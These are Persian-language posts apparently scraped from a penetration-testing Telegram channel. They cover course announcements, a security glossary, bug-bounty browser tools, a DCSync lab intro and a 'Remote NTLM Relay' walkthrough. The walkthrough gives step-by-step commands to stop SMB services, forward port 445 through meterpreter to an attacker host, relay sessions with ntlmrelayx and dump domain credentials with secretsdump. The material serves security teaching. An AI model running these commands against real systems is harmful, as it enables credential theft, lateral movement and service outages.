⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :
💠 کانال های تلگرام ما
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
💠 کانال های تلگرام ما
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
❤2
Credential Dumping DCSync Attack By Kaveh.pdf
4.1 MB
📖 Credential Dumping DCSync Attack
حمله Active Directory Credential Dumping (DCSync) تکنیکی تخصصی است که مهاجمین برای استخراج اعتبارنامهها از کنترلکننده دامنه (DC) بهکار میبرند، با این روش که خود را شبیه یک کنترلکننده دامنه نشان میدهند.
راهاندازی یک محیط آزمایشگاهی برای شبیه سازی حمله
درک پروتکل DRS و نحوه عملکرد حمله
چرایی وقوع این misconfiguration در دنیای واقعی
Exploiting از misconfiguration
نگاشت حمله به MITRE ATT&CK
Detecting حمله
استراتژی های کاهش خطر
راهاندازی لاب (Lab Setup)
نیازمندیها:
یک محیط مجازی سازی (مثلاً VMware، VirtualBox یا Hyper-V).
یک Windows Server که بهعنوان کنترلکننده دامنه پیکربندی شده باشد.
یک ماشین کلاینت ویندوز.
ابزارها: Impacket، Mimikatz، Netexec و Metasploit.
مراحل:
پیکربندی کنترلکننده دامنه:
ویندوز سرور را نصب و پیکربندی کنید تا بهعنوان کنترلکننده دامنه (DC) عمل کند؛ نام دامنه را مثلاً ignite.local قرار دهید و آدرس IP را بهصورت ایستا (static) تنظیم کنید مثلاً 192.168.1.48. AD را راهاندازی کنید و چند کاربر و گروه ایجاد کنید.
@KavehOffSec
@TryHackBox
حمله Active Directory Credential Dumping (DCSync) تکنیکی تخصصی است که مهاجمین برای استخراج اعتبارنامهها از کنترلکننده دامنه (DC) بهکار میبرند، با این روش که خود را شبیه یک کنترلکننده دامنه نشان میدهند.
راهاندازی یک محیط آزمایشگاهی برای شبیه سازی حمله
درک پروتکل DRS و نحوه عملکرد حمله
چرایی وقوع این misconfiguration در دنیای واقعی
Exploiting از misconfiguration
نگاشت حمله به MITRE ATT&CK
Detecting حمله
استراتژی های کاهش خطر
راهاندازی لاب (Lab Setup)
نیازمندیها:
یک محیط مجازی سازی (مثلاً VMware، VirtualBox یا Hyper-V).
یک Windows Server که بهعنوان کنترلکننده دامنه پیکربندی شده باشد.
یک ماشین کلاینت ویندوز.
ابزارها: Impacket، Mimikatz، Netexec و Metasploit.
مراحل:
پیکربندی کنترلکننده دامنه:
ویندوز سرور را نصب و پیکربندی کنید تا بهعنوان کنترلکننده دامنه (DC) عمل کند؛ نام دامنه را مثلاً ignite.local قرار دهید و آدرس IP را بهصورت ایستا (static) تنظیم کنید مثلاً 192.168.1.48. AD را راهاندازی کنید و چند کاربر و گروه ایجاد کنید.
@KavehOffSec
@TryHackBox
🔥4❤1
جشن مهرگان یادآور پیروزی عدل و داد بر جور و بیدادگری است و نماد آزادیخواهی در فرهنگ ایرانیان به شمار میآید. ایرانیان در این روز به رهبری کاوه آهنگر بر ضحاک (آژی دهاک) ظالم پیروز شدند و فریدون از دودمان پیشدادی بر تخت شاهی نشست.از این پس،کاوه آهنگر در فرهنگ ایرانی نماد مقاومت و آزادیخواهی،و ضحاک نماد ظلم و ستم محسوب شد.
مهرگان یکی از قدیمیترین جشنهای ایرانی است که در روز دهم مهر ماه برگزار میشود و به پاسداشت ایزد مهر (خدای پیمان،راستی و دوستی)برگزار میگردد.این جشن نمادی از نیکی، دوستی،برداشت محصول و پایان فصل گرما و آغاز پاییز است.آیینهای مهرگان شامل نثارگل، اهدای هدایا،برپایی سفره مهرگانی و اجرای مراسم شادی و مهرورزی است.
مهرگان همچنین نماد برابری و همبستگی اجتماعی است جایی که شاه و رعیت همه با هم به جشن میپرداختند.این جشن در ایران باستان اهمیت ویژهای داشت و در دوران ساسانی نیز با شکوه فراوان برگزار میشد.حتی پس از ورود اسلام، جشن مهرگان در برخی مناطق ایران و میان زرتشتیان ادامه یافته است.
در نهایت،مهرگان فرصتی است برای پاسداشت دوستی،مهرورزی و سپاسگزاری از نعمتهای الهی .
@TryHackBox
مهرگان یکی از قدیمیترین جشنهای ایرانی است که در روز دهم مهر ماه برگزار میشود و به پاسداشت ایزد مهر (خدای پیمان،راستی و دوستی)برگزار میگردد.این جشن نمادی از نیکی، دوستی،برداشت محصول و پایان فصل گرما و آغاز پاییز است.آیینهای مهرگان شامل نثارگل، اهدای هدایا،برپایی سفره مهرگانی و اجرای مراسم شادی و مهرورزی است.
مهرگان همچنین نماد برابری و همبستگی اجتماعی است جایی که شاه و رعیت همه با هم به جشن میپرداختند.این جشن در ایران باستان اهمیت ویژهای داشت و در دوران ساسانی نیز با شکوه فراوان برگزار میشد.حتی پس از ورود اسلام، جشن مهرگان در برخی مناطق ایران و میان زرتشتیان ادامه یافته است.
در نهایت،مهرگان فرصتی است برای پاسداشت دوستی،مهرورزی و سپاسگزاری از نعمتهای الهی .
@TryHackBox
❤12🔥2
Try Hack Box
#جلسه_ششم دوره #رایگان سکوریتی پلاس | Security + بخش : Hashing دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیادهسازی…
#جلسه_هفتم دوره #رایگان سکوریتی پلاس | Security +
بخش : گواهی های دیجیتال
دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیادهسازی راهکارهای امنیتی،اصول رمزنگاری و درک اصول امنیت شبکه را آموزش میدهد.
برای دیدن ویدئو روی لینک زیر کلیک کنید :
https://youtu.be/4ZybmjvZSuY
انتقادی داشتید حتما اطلاع بدید، تا بتونیم آموزش با کیفیتتری ارائه بدیم،امیدواریم از آموزش لذت ببرید.
----------
🆔 @TryHackBox
----------
بخش : گواهی های دیجیتال
دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیادهسازی راهکارهای امنیتی،اصول رمزنگاری و درک اصول امنیت شبکه را آموزش میدهد.
برای دیدن ویدئو روی لینک زیر کلیک کنید :
https://youtu.be/4ZybmjvZSuY
انتقادی داشتید حتما اطلاع بدید، تا بتونیم آموزش با کیفیتتری ارائه بدیم،امیدواریم از آموزش لذت ببرید.
----------
🆔 @TryHackBox
----------
❤7
Try Hack Box
#جلسه_هفتم دوره #رایگان سکوریتی پلاس | Security + بخش : گواهی های دیجیتال دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات،…
دوستانی که دوره سکوریتی پلاس مارو میگذرونند ، ما یک گروه ایجاد کردیم که فایل تمرینی یا اگر سوالی یا مشکلی داشتید بپرسید و فایل ها رو در اختیارتون قرار بدیم اگر مایل بودید به گروه بپیوندید به ما پیام دهید لینک گروه رو ارسال کنیم برای شما :
@Unique_exploitbot
@Unique_exploitbot
❤4
واژه نامه امنیت سایبری TryHackBox (1).pdf
2 MB
🔖 واژهنامه امنیت سایبری TryHackBox
مجموعهای کاربردی از مفاهیم، اصطلاحات و واژههای کلیدی دنیای امنیت سایبری، مخصوص علاقهمندان به تست نفوذ، رد تیم و دفاع سایبری.
@TryHackBox | Github | YouTube | Group
مجموعهای کاربردی از مفاهیم، اصطلاحات و واژههای کلیدی دنیای امنیت سایبری، مخصوص علاقهمندان به تست نفوذ، رد تیم و دفاع سایبری.
@TryHackBox | Github | YouTube | Group
👏11🔥4👍3
Browser Extensions For Bug Bounty
🌐 سری اکستنشن های مفید برای باگ بانتی که داشتنشون در مرورگرتون میتونه کمک مفیدی به فعالیتتون بکنه
✍️نویسنده
@TryHackBox | The Chaos
🌐 سری اکستنشن های مفید برای باگ بانتی که داشتنشون در مرورگرتون میتونه کمک مفیدی به فعالیتتون بکنه
✍️نویسنده
@TryHackBox | The Chaos
❤6👍1
Try Hack Box
Browser Extensions For Bug Bounty 🌐 سری اکستنشن های مفید برای باگ بانتی که داشتنشون در مرورگرتون میتونه کمک مفیدی به فعالیتتون بکنه ✍️نویسنده @TryHackBox | The Chaos
🛠 اکستنشن های کمکی برای تست نفوذ و امنیت وب
🔍 شناسایی تکنولوژیها
• Wappalyzer
پروفایلر تکنولوژی - شناسایی CMS، فریمورکها و کتابخانههای جاوااسکریپت
🎯 تست نفوذ و آنالیز
• Hackbar
افزونه تست نفوذ برای Chrome و Firefox
• OWASP Penetration Testing Kit
اسکن امنیتی برنامههای وب (DAST & SCA)
• KNOXSS Community Edition
ابزار کشف XSS
🔒 امنیت و اسکن آسیبپذیری
• Retire.js
اسکن کتابخانههای جاوااسکریپت آسیبپذیر
• Trufflehog
شناسایی خودکار API keys و credentials
• DotGit
تشخیص دایرکتوریهای git در معرض دید
• Bishop Vulnerability Scanner
اسکنر سیستمهای کنترل نسخه و ابزارهای ادمین
🌐 مدیریت درخواستها و هدرها
• FoxyProxy
مدیریت آسان پروکسی سرور
• Modheader
تغییر هدرهای HTTP و URL
• Request Maker
ضبط، تغییر و ارسال درخواستهای HTTP
🔎 جستجو و اوسینت
• Shodan
یافتن اطلاعات هاستینگ و پورتهای باز
• Hunter
یافتن آدرسهای ایمیل در وبسایتها
• Mitaka
جستجوی IP، دامنه، URL و هش از طریق منو راستکلیک
⚡️ ابزارهای کمکی
• Open Multiple URLs
باز کردن چندین URL همزمان
• Cookie-Editor
مدیریت کوکیها برای تب جاری
• S3 Bucket List
ثبت اکسپوز S3 buckets
• d3coder
انکود و دیکد متن (base64, rot13, ...)
✍️نویسنده
@TryHackBox | The Chaos
#BugBounty #Browser #Extension #Tools
🔍 شناسایی تکنولوژیها
• Wappalyzer
پروفایلر تکنولوژی - شناسایی CMS، فریمورکها و کتابخانههای جاوااسکریپت
🎯 تست نفوذ و آنالیز
• Hackbar
افزونه تست نفوذ برای Chrome و Firefox
• OWASP Penetration Testing Kit
اسکن امنیتی برنامههای وب (DAST & SCA)
• KNOXSS Community Edition
ابزار کشف XSS
🔒 امنیت و اسکن آسیبپذیری
• Retire.js
اسکن کتابخانههای جاوااسکریپت آسیبپذیر
• Trufflehog
شناسایی خودکار API keys و credentials
• DotGit
تشخیص دایرکتوریهای git در معرض دید
• Bishop Vulnerability Scanner
اسکنر سیستمهای کنترل نسخه و ابزارهای ادمین
🌐 مدیریت درخواستها و هدرها
• FoxyProxy
مدیریت آسان پروکسی سرور
• Modheader
تغییر هدرهای HTTP و URL
• Request Maker
ضبط، تغییر و ارسال درخواستهای HTTP
🔎 جستجو و اوسینت
• Shodan
یافتن اطلاعات هاستینگ و پورتهای باز
• Hunter
یافتن آدرسهای ایمیل در وبسایتها
• Mitaka
جستجوی IP، دامنه، URL و هش از طریق منو راستکلیک
⚡️ ابزارهای کمکی
• Open Multiple URLs
باز کردن چندین URL همزمان
• Cookie-Editor
مدیریت کوکیها برای تب جاری
• S3 Bucket List
ثبت اکسپوز S3 buckets
• d3coder
انکود و دیکد متن (base64, rot13, ...)
✍️نویسنده
@TryHackBox | The Chaos
#BugBounty #Browser #Extension #Tools
❤10👍6
🚀 آغاز مرحله مقدماتی مسابقه BlueCup
🔵 در مرحله اول این رقابت، شرکتکنندگان با مجموعهای از چالشهای مربوط به شناسایی حملات روبهرو میشن. شروع مسیر با سوالاتی از حوزه پاسخگویی به رخداد خواهد بود و بعد از اون باید سراغ حل چالشهای فنی برید.
🏆 نفرات برتر این مرحله به دور بعد راه پیدا میکنن و در قالب گروهی رقابت میکنن؛ رقابتها تا فینال ادامه خواهد داشت و در نهایت برترینها در قالبی متفاوت به مصاف هم میرن.
📅 تاریخ برگزاری: جمعه 18 مهر
⏰ زمان: 10 صبح تا 17 (7 ساعت)
📍 محل: بخش مسابقات در پروفایل کاربری Challenginno
⚡️ نکات مهم:
برای شرکت در مسابقه نیازی به ثبتنام مجدد و پرداخت هزینه نیست.
کاربرانی که هنوز ثبتنام نکردهاند، تا شروع مسابقه فرصت دارن حساب خودشون رو بسازن.
سطح مسابقه: مقدماتی تا متوسط
🎁 جوایز نقدی:
🥇 نفر اول: 30 میلیون تومان
🥈 نفر دوم: 10 میلیون تومان
(در فینال امکان انتخاب حالت Raise هم وجود داره که شرایط اون اعلام خواهد شد.)
🔗 همین حالا آماده شو و وارد رقابت BlueCup بشو!
🌐 https://challenginno.ir
🌐 https://news.1rj.ru/str/challenginno
🔵 در مرحله اول این رقابت، شرکتکنندگان با مجموعهای از چالشهای مربوط به شناسایی حملات روبهرو میشن. شروع مسیر با سوالاتی از حوزه پاسخگویی به رخداد خواهد بود و بعد از اون باید سراغ حل چالشهای فنی برید.
🏆 نفرات برتر این مرحله به دور بعد راه پیدا میکنن و در قالب گروهی رقابت میکنن؛ رقابتها تا فینال ادامه خواهد داشت و در نهایت برترینها در قالبی متفاوت به مصاف هم میرن.
📅 تاریخ برگزاری: جمعه 18 مهر
⏰ زمان: 10 صبح تا 17 (7 ساعت)
📍 محل: بخش مسابقات در پروفایل کاربری Challenginno
⚡️ نکات مهم:
برای شرکت در مسابقه نیازی به ثبتنام مجدد و پرداخت هزینه نیست.
کاربرانی که هنوز ثبتنام نکردهاند، تا شروع مسابقه فرصت دارن حساب خودشون رو بسازن.
سطح مسابقه: مقدماتی تا متوسط
🎁 جوایز نقدی:
🥇 نفر اول: 30 میلیون تومان
🥈 نفر دوم: 10 میلیون تومان
(در فینال امکان انتخاب حالت Raise هم وجود داره که شرایط اون اعلام خواهد شد.)
🔗 همین حالا آماده شو و وارد رقابت BlueCup بشو!
🌐 https://challenginno.ir
🌐 https://news.1rj.ru/str/challenginno
❤7
NTLM Relay Attack ?
خیلیها اسم حملات NTLM Relay رو شنیدن، اما مثل اغلب حملات دیگه، برای اجرا شدن نیاز به برآورده شدن شرایط مشخصی هست.
اغلب این حملات یا با کمک Responder انجام میشن که در این حالت کلید موفقیت وابسته به موفقیت Poisoning درخواست های Broadcast هست که بعضی پروتکل ها در شبکه های ویندوزی ازشون استفاده میکنن یا از مکانیزم Coerce (اجبار به احراز هویت) استفاده میشه.
در حالت اول ما باید دسترسی به همون شبکهای که «قربانی» توشه داشته باشیم، و در حالت دوم امکان relay حساب یک کامپیوتر دامینی رو بهدست مییاریم که باز هم همیشه نتیجهٔ دلخواه رو نمیده.
@TryHackBox
#NTLM #AD #Attack
خیلیها اسم حملات NTLM Relay رو شنیدن، اما مثل اغلب حملات دیگه، برای اجرا شدن نیاز به برآورده شدن شرایط مشخصی هست.
اغلب این حملات یا با کمک Responder انجام میشن که در این حالت کلید موفقیت وابسته به موفقیت Poisoning درخواست های Broadcast هست که بعضی پروتکل ها در شبکه های ویندوزی ازشون استفاده میکنن یا از مکانیزم Coerce (اجبار به احراز هویت) استفاده میشه.
در حالت اول ما باید دسترسی به همون شبکهای که «قربانی» توشه داشته باشیم، و در حالت دوم امکان relay حساب یک کامپیوتر دامینی رو بهدست مییاریم که باز هم همیشه نتیجهٔ دلخواه رو نمیده.
@TryHackBox
#NTLM #AD #Attack
🔥5
🔖 اصل قضیه: Remote NTLM Relay
⭕ امروز می خوام یک وکتور دیگه از NTLM Relay رو بررسی کنم. این وکتور به خاطر ویژگی های exploiting زیاد استفاده نشده، ولی دونستنش مفیده.
اینجا حرف از Remote NTLM Relay هست: حملهای که با متوقفسازی اجباری سرویس های SMB روی سرور و راهاندازی مجدد اون ها کار میکنه، بهطوری که ترافیک واردشون روی پورت 445 پس از ری استارت به ماشین مهاجم هدایت بشه. به این ترتیب مهاجم میتونه سشن های ورودی رو به هر جایی که میخواد رله کنه.
برای exploiting باید چند مرحله ساده رو انجام بدیم.
💢 مرحله 1 > آماده سازی سرور
برای آماده سازی سرور جهت exploiting، باید سرویس های SMB رو غیرفعال و سرور رو ری استارت کنیم. مراحل به صورت کلی اینه:
1. غیرفعالسازی NetLogon:
2. غیرفعال و متوقفکردن SMB Server (LanManServer):
3. توقف کامل LanManWorkstation:
این مراحل توی اسکرین شات اول قابل مشاهدهست.
بعد از غیرفعالسازی سرویسها باید ماشین رو ری استارت کنیم (
پس از بوت شدن مجدد و بهدست آوردن شل روی سرور (در این سناریو من از meterpreter استفاده کردم)، میتونیم به مرحله بعد بریم.
💢 مرحله 2 > تنظیم ماشین مهاجم
روی ماشین مهاجم برای رله کردن NTLM از اسکریپت ntlmrelayx.py از مجموعهٔ Impacket استفاده میکنیم. در مثالی که من اجرا کردم، هدف سرور
💢 مرحله 3 > TCP relay با meterpreter
با شلی که در مرحلهٔ اول گرفتیم، ترافیک ورودی به پورت
اگر همه چیز رو درست انجام بدیم، باید بتونیم یک سشن بگیریم و با موفقیت اون رو رله کنیم مثل چیزی که توی اسکرین شات سوم می بینید.
💢 مرحله 4 > Post-exploitation
بعد از اینکه رله موفق باشه،
در سناریوی من، کاربری که سشنش رله شد سطح بالایی از دسترسی ها روی ماشین تارگت داشت؛ بنابراین منطقیه از secretsdump.py برای استخراج اعتبارنامهها و lateral movement در دامنه استفاده کنیم:
چرا این وکتور کمتر رایجه؟
دلیل اینکه این وکتور خیلی گسترده نشده، ماهیت مخرب و تخریبی اون هست:
غیرفعالکردن سرویس های SMB روی یک سرور فعال باعث DoS و توقف سرویس میشه. در محیط های واقعی این عواقب میتونن مشکلات جدی ایجاد کنن بنابراین اجرای این حمله تنها باید با مجوز صریح (explicit authorization) از مشتری/مالک شبکه انجام بشه.
@TryHackBox
#AD #NTLM #Attack
⭕ امروز می خوام یک وکتور دیگه از NTLM Relay رو بررسی کنم. این وکتور به خاطر ویژگی های exploiting زیاد استفاده نشده، ولی دونستنش مفیده.
اینجا حرف از Remote NTLM Relay هست: حملهای که با متوقفسازی اجباری سرویس های SMB روی سرور و راهاندازی مجدد اون ها کار میکنه، بهطوری که ترافیک واردشون روی پورت 445 پس از ری استارت به ماشین مهاجم هدایت بشه. به این ترتیب مهاجم میتونه سشن های ورودی رو به هر جایی که میخواد رله کنه.
برای exploiting باید چند مرحله ساده رو انجام بدیم.
💢 مرحله 1 > آماده سازی سرور
برای آماده سازی سرور جهت exploiting، باید سرویس های SMB رو غیرفعال و سرور رو ری استارت کنیم. مراحل به صورت کلی اینه:
1. غیرفعالسازی NetLogon:
sc stop netlogon
2. غیرفعال و متوقفکردن SMB Server (LanManServer):
sc stop lanmanserver
sc config lanmanserver start= disabled
3. توقف کامل LanManWorkstation:
sc stop lanmanworkstation
sc config lanmanworkstation start= disabled
این مراحل توی اسکرین شات اول قابل مشاهدهست.
بعد از غیرفعالسازی سرویسها باید ماشین رو ری استارت کنیم (
shutdown /r /t 0) خیلی مهمه که دستگاه ری استارت بشه نه اینکه خاموش بشه.پس از بوت شدن مجدد و بهدست آوردن شل روی سرور (در این سناریو من از meterpreter استفاده کردم)، میتونیم به مرحله بعد بریم.
💢 مرحله 2 > تنظیم ماشین مهاجم
روی ماشین مهاجم برای رله کردن NTLM از اسکریپت ntlmrelayx.py از مجموعهٔ Impacket استفاده میکنیم. در مثالی که من اجرا کردم، هدف سرور
10.201.126.30 بود (چون برای این هدف SMB نیازی به signing نداشت). پراکسی ای که استفاده میکنیم روی پورت 1090 listening میکنه، بنابراین دستور اجرا شبیه اینه:proxychains impacket-ntlmrelayx -t smb://10.201.126.30 -smb2support -socks -socks-port 1090
💢 مرحله 3 > TCP relay با meterpreter
با شلی که در مرحلهٔ اول گرفتیم، ترافیک ورودی به پورت
445/TCP روی سرور رو به ماشین مهاجم (که رله رو انجام میده) فوروارد/ریدایرکت می کنیم. مثال دستور:portfwd add -R -L 10.51.124.39 -l 445 -p 445
اگر همه چیز رو درست انجام بدیم، باید بتونیم یک سشن بگیریم و با موفقیت اون رو رله کنیم مثل چیزی که توی اسکرین شات سوم می بینید.
💢 مرحله 4 > Post-exploitation
بعد از اینکه رله موفق باشه،
ntlmrelayx.py معمولاً سشن رو باز نگه میداره؛ بنابراین با ساخت یک کانفیگ سفارشی برای proxychains می تونیم از ابزارهای دیگهٔ Impacket-like برای کارهای post-exploitation استفاده کنیم.در سناریوی من، کاربری که سشنش رله شد سطح بالایی از دسترسی ها روی ماشین تارگت داشت؛ بنابراین منطقیه از secretsdump.py برای استخراج اعتبارنامهها و lateral movement در دامنه استفاده کنیم:
proxychains -f p4-ntlm-relay.conf impacket-secretsdump -no-pass HOLOLIVE/SRV-ADMIN@10.201.126.30
چرا این وکتور کمتر رایجه؟
دلیل اینکه این وکتور خیلی گسترده نشده، ماهیت مخرب و تخریبی اون هست:
غیرفعالکردن سرویس های SMB روی یک سرور فعال باعث DoS و توقف سرویس میشه. در محیط های واقعی این عواقب میتونن مشکلات جدی ایجاد کنن بنابراین اجرای این حمله تنها باید با مجوز صریح (explicit authorization) از مشتری/مالک شبکه انجام بشه.
@TryHackBox
#AD #NTLM #Attack
🔥4❤1
Secure and insecure ports
⚠️ پورتهای ناامن (ارسال داده بدون رمزنگاری)
✅ پورتهای امن (با رمزنگاری)
-> پورت هایی که نام برده شده به صورت گسترده در حال استفاده اند و دانستن آنها میتواند شبکه شما را امن تر کند یا تست نفوذ شما را سریع تر به عمل برساند
✍️نویسنده
@TryHackBox | The Chaos
#CyberSecurity #Network #Ports
⚠️ پورتهای ناامن (ارسال داده بدون رمزنگاری)
✅ پورتهای امن (با رمزنگاری)
-> پورت هایی که نام برده شده به صورت گسترده در حال استفاده اند و دانستن آنها میتواند شبکه شما را امن تر کند یا تست نفوذ شما را سریع تر به عمل برساند
✍️نویسنده
@TryHackBox | The Chaos
#CyberSecurity #Network #Ports
👍7